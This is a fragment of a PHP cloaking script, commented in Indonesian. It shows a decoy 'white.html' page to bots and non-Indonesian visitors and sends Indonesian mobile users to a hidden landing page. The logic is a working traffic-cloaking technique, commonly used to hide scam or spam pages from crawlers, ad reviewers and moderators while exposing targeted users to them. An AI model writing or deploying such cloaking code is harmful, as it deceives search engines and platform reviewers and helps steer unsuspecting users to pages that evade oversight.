isMobile(); // Jika bot atau bukan dari Indonesia, tampilkan halaman white if ($isBot || $country !== 'Indonesia') { echo file_get_contents('white.html'); ob_end_flush(); exit(); } // Jika dari Indonesia dan perangkat mobile, redirect ke landing page if ($isMobile && $country === 'Indonesia') { echo ' Redirecting...

Redirecting to the landing page...

'; ob_end_flush(); exit(); } // Selain itu tampilkan white.html echo file_get_contents('white.html'); ob_end_flush(); ?>